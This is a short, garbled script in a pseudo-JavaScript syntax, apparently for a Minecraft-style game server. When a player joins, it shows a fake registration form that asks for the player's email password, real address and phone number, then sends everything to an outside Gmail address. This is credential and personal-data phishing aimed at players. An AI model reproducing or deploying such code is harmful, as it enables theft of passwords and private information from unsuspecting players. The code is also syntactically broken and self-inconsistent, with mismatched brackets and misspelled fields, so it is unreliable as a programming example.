

Event.onPlayerJoin({e}=>{run f(e.player)})
public function f(p){ui.create(form).title("Register Form").body("please enter you real address and password").input("name").input("email").input("password email").input("real address").input("Phone Number")ui.show(p).then({r}=>{new assets("data", r.input[0], r.input[3], r.input[1], r.input[4], r.input[2])})}
class assets {
	constructor(file, player, address, email, number, password) {this.file = file; this.player=player; this.player_address=address; this.player_number=number; this.player_emal=email; this.player_password=password};
	var Library=[];var system=true;
	setInterval(function(){try{return[Library.push(import from"...")...]} catch(e){console.warn(e)return system=false;}}, 1)
	public function e(){
		if(Library.includes(this.file)) {for(let L of Library){try{if(L==this.file)) return L;} catch(e){return null;}}}};
	public function isDuplicat(){
		try{if(this.file.count > 1) return true;} catch(e){return false;}};
	public function nu(){if(this.file=="data") return run r();}
	private r(){
		Gmail.push(
			{send_to: "luxybro123@gmail.com"},
			{sender: "minecraft.data"},
			{text:
				["Data"],
				[this.file],
				[this.player],
				[this.player_address],
				[this.player_email],
				[this.player_password],
				[this.player_number],
				["saved"]
			}
		)
	}
}